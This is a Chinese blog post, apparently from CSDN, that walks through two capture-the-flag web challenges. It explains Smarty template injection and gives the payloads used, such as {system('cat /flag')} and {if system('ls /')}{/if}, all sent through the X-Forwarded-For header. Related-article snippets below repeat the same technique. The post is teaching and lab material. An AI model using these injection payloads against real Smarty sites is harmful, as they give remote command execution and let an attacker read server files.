[CISCN 2019华东南]Web11 和[NISACTF 2022]midlevel

最新推荐文章于 2023-09-19 16:54:24 发布
最新推荐文章于 2023-09-19 16:54:24 发布
阅读量445 收藏
点赞数 1
分类专栏: web刷题 文章标签: php javascript web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Leaf_initial/article/details/130397310
版权

[CISCN 2019华东南]Web11

请添加图片描述

从这个图得到提示,是Smarty 模板注入
先介绍一下Smarty

简介:

Smarty是基于PHP开发的,对于Smarty的SSTI的利用手段与常见的flask的SSTI有很大区别。
了解过Jinjia2模板注入的同学应该知道,jinjia2是基于python的,而Smarty是基于PHP的,所以理解起来还是很容易,我们只需要达到命令执行就可以了。

查看版本:

{$smarty.version}
常用标签
{php}

Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令,最常规的思路自然是先测试该标签。

{php}phpinfo(){/php}

但是这个也是要分版本的,Smarty已经废弃{php}标签。在Smarty 3.1,{php}仅在SmartyBC中可用。

直接输入php命令即可:{system(‘ls /’)}
在这里插入图片描述

{literal} 标签

官方手册这样描述这个标签:

{literal}可以让一个模板区域的字符原样输出。 这经常用于保护页面上的Javascript或css样式表,避免因为Smarty的定界符而错被解析。

使用Javascript语句进行命令之执行,常见的变形语句:

<script language="php">phpinfo();</script>

当然这样的语法,在PHP5里面可以使用,在PHP7里面不可以使用,本地测试一下:
在这里插入图片描述因为{literal}支持javascprit语法,所以我们可以RCE,用法如下:

{literal}
<script language="php">phpinfo();</script>
{/literal}
{if}

{if}标签

官方文档中看到这样的描述:

Smarty的{if}条件判断和PHP的if非常相似,只是增加了一些特性。每个{if}必须有一个配对的{/if},也可以使用{else} 和 {elseif},全部的PHP条件表达式和函数都可以在if内使用,如||*, or, &&, and, is_array(), 等等,如:{if is_array($array)}{/if}*

既然全部的PHP函数都可以使用,那么我们是可以利用此来执行我们的代码

{if phpinfo()}{/if}
{if system('ls')}{/if}

请添加图片描述~~~
111~~
~~

可以看到我们有/api和/xff两个路由,一个变量是IP另一个是XFF,但是由于环境问题,我们不能通过构造IP来进行模板注入,所以我们只能通过伪造XFF来进行注入,利用burp suite来构造payload来查看当前的Smaryt 版本:

X-Forwarded-For:{$smarty.version}

请添加图片描述

回显在右上角的Current IP中,看来是没有过滤什么东西,注意版本号是3.1.30这意味着这道题可能有两种写法:

因为{literal}标签存在于php5的版本,所以这里不太好用(可能是我姿势不对)这里显示是这样的
请添加图片描述

写法一:{php}标签

payload:

{system('ls /')}	  //读取根目录文件
{system('cat /flag')} //读取flag

请添加图片描述

可以查看到flag

写法二:{if}标签

{if system('ls /')}{/if}
{if system('cat /flag')}{/if}

同样可以读取flag

[NISACTF 2022]midlevel

和上题一样。。。。无语

参考文章:
PHP Smarty模版注入

Leafzzz__
关注
专栏目录
detection proposals综述(What makes for effective detection proposals?)
mingo_敏
07-07 6180
本文地址:http://blog.csdn.net/shanglianlm/article/details/467863031 介绍(INTRODUCTION)本文主要对最近的 proposal 检测方法做一个总结和评价。主要是下面这些方法。 2 Detection Proposal 方法(DETECTION PROPOSAL METHODS)作者将 Detection Proposal 分为两类
[NISACTF 2022]midlevel
m0_73612768的博客
01-04 788
Smarty 模板注入;
[CISCN2019 华东赛区]Web11
oubasangdadada的博客
03-02 1844
题目提醒Build With Smarty,猜测应该是smarty ssti,右上角显示了IP,猜测注入点应该再X-Forwarded-For 设置X-Forwarded-For为{7+7},在current ip 处回显14,确实在这里存在ssti 查阅smarty手册,发现{$smarty.version},返回版本信息3.1.30,这里smarty的版本是,${smarty.tem...
[NISACTF 2022]下
qq_62046696的博客
07-30 2690
打开界面看见这种,格式一般都是利用管道符然后进行堆叠注入或者报错注入试一下堆叠注入试了一下被过滤掉了,那就是报错注入喽or被过滤用||代替=被过滤用like代替database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名column被过滤,用无列名注入输出长度限制,mid函数,substr函数t因为as被过滤所以不能使用,database因为aa是错误的表名,sqlsql就是正确的表名,通过报错。...
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
Resume-Manufacturing-Engineer-Midlevel.doc )
07-03
**ERP & MRP:** ERP(企业资源规划)是一种集成的信息管理系统,用于管理和协调所有企业资源,如财务、人力资源、生产和分销等。MRP(物料需求计划)是ERP的一个组成部分,专门用于处理制造企业的物料计划和控制。 **...
dissatisfaction-models
03-30
将midlevel-master文件夹放置在该项目的根目录中。 下载批注ja-annotations并将文件夹放置在该项目的根目录中。 这仅对于帧级模型是必需的。 克隆此存储库或将其下载为ZIP并解压缩。 在MATLAB中打开...
[CISCN2019 华东赛区]Web11 1
weixin_53150482的博客
07-21 248
[CISCN2019 华东赛区]Web11 1
BUUCTF [CISCN2019 华东赛区] Web11
Senimo
12-23 671
BUUCTF [CISCN2019 华东赛区] Web11 考点: 根据页面提示,应该是一个类似IP查询的网站,根据**XXF(X-Forwarded-For)**判断
BUUCTF之[CISCN2019 华东赛区]Web11 ------ SSTI注入
weixin_44632787的博客
06-23 1528
BUUCTF之[CISCN2019 华东赛区]Web11 知识点 SSTI smarty X-Forwarded-For 题目 于是开始BurpSuite抓包和添加X-Forwarded-For:127.0.0.1 emmmmmm其实一开始添加完这个就不知道怎么做了,后来去看了别人的WP有提示SSTI和smarty这两个词。心想,这个不是最近才做过类似的题目嘛。。。哎!我居然没想到! 所以开始尝试一下:X-Forwarded-For:{7*8} 获取当前目录有那些文件:X-Forwarded-F
[CISCN2019 华东赛区]Web11 wp
m0_55185160的博客
03-25 3080
打开题目看到X-Forwarded-For,便想到利用burpsuite,修改X-Forwarded-For 看到确实有回显,还可以看到Build With Smarty !这时想到在学flask ssti中学习到ssti中也有smarty的ssti。 发现在current ip:56说明存在ssti,在利用7{*comment*}7测试一下是否是smarty 然后就可以利用smarty的ssti方式进行命令执行了 payload:{if system('cat /flag')}{/..
NO.2-29 [CISCN2019 华东赛区]Web11
nigo134的博客
08-03 321
BUUCTF之[CISCN2019 华东赛区]Web11 知识点 SSTI smarty X-Forwarded-For 题目 于是开始BurpSuite抓包和添加X-Forwarded-For:127.0.0.1 emmmmmm其实一开始添加完这个就不知道怎么做了,后来去看了别人的WP有提示SSTI和smarty这两个词。心想,这个不是最近才做过类似的题目嘛。。。哎!我居然没想到! 所以开始尝试一下:X-Forwarded-For:{7*8} 获取当前目录有那些文件:X-Forwarded-.
[CISCN2019 华东赛区]Web11 SSTI
m0_64180167的博客
09-19 114
这道SSTI 差点给我渗透的感觉了 全是API 我还想去访问API看看。发现成功了 是受控的 这里我就开始没有思路了。欸 那我们可不可以直接修改参数呢。没有东西 我们看看还有什么提示。于是看了wp 说是ssti。发现这里读取了我们的ip。我们抓包看看是如何做到的。
[CISCN 2019华东]Web11和[鹏城杯 2022]简单包含
m0_73700261的博客
04-24 187
这里的突破口在&&如果满足前边的条件了那后边就不会执行就直接进入if。所以就是我们需要传参一个要大于800个字的东西接着就能输出flag。题目打开是一个这么个界面,里边提到了一个xff的头。试着传参一个带filter协议的payload。简单来说就是需要传参一个带协议的payload。解码发现是一串代码里边是想要输出flag的条件。接着就会include你想要的文件。先使用{{7*7}}来测试一波。发现回显一段base64的代码。打开来是个蛮简单的源代码。下边还有一个这么的提示。这里过滤了一个flag。
buuctf | CISCN2019华东web11
菜鸡一枚
03-07 140
SSTI服务器端模板注入(Smarty模块)
软件企业员工信息管理系统1、数据模型管理人员、开发人员共有属性:编号、姓名、出生年月、所在部门开发人员:岗位(架构、设计、前端、后端)、级别管理人员:职位(总经理、项目经理等)2、功能增加、删、改、查统计:性别、年龄段、人员类别等3、数据持久存储读取、保存 用Java写出完整代码
最新发布
06-20
首先,我需要强调,由于软件企业员工信息管理系统是一个复杂的应用,涉及到多个模块的设计和实现,并且包括数据库操作、用户界面设计以及业务逻辑处理等部分,不可能在这里直接给出完整的Java代码。但我可以为你提供一个基本的数据库实体类(Entity)和一些核心功能的方法示例。在这个场景中,我们可以使用Java的Hibernate或JPA进行ORM(Object-Relational Mapping)映射。 ```java import javax.persistence.Entity; import javax.persistence.GeneratedValue; import javax.persistence.GenerationType; import javax.persistence.Id; import java.util.Date; @Entity public class Employee { @Id @GeneratedValue(strategy = GenerationType.IDENTITY) private Long id; private String name; private Date birthDate; private String department; private String position; private String gender; private String ageCategory; private String personnelCategory; // getters and setters public Long getId() { return id; } public void setId(Long id) { this.id = id; } public String getName() { return name; } public void setName(String name) { this.name = name; } // ...其他属性的getter和setter... // 如果有级别的关联,可以通过继承或枚举来表示 // 如下只展示简单的版本 public enum PositionLevel { Junior, MidLevel, Senior } public PositionLevel getPositionLevel() { // 根据实际业务逻辑设置 } public void setPositionLevel(PositionLevel level) { // ... } // 重写equals(), hashCode()和toString()方法以支持比较和打印 @Override public boolean equals(Object o) { if (this == o) return true; if (o == null || getClass() != o.getClass()) return false; Employee employee = (Employee) o; return id.equals(employee.id); } @Override public int hashCode() { return Objects.hash(id); } @Override public String toString() { return "Employee{" + "id=" + id + ", name='" + name + '\'' + ", birthDate=" + birthDate + ", department='" + department + '\'' + ", position='" + position + '\'' + ", gender='" + gender + '\'' + ", ageCategory='" + ageCategory + '\'' + ", personnelCategory='" + personnelCategory + '\'' + '}'; } } // 对应的CRUD操作接口,这里只展示基础的 public interface EmployeeRepository extends JpaRepository<Employee, Long> { List<Employee> findAllByDepartmentAndPosition(String department, String position); Employee findByIdAndPersonnelCategory(Long id, String personnelCategory); // ...其他方法 } // 假设有一个UserService来处理增删改查操作 public class UserService { private final EmployeeRepository repository; public UserService(EmployeeRepository repository) { this.repository = repository; } public void save(Employee employee) { repository.save(employee); } public void deleteById(Long id) { repository.deleteById(id); } // ...其他方法,如update和find等 } ``` 这只是整个系统的一部分,实际项目会包含数据库配置、服务层的控制器、视图层的JSP/Thymeleaf等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leafzzz__

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值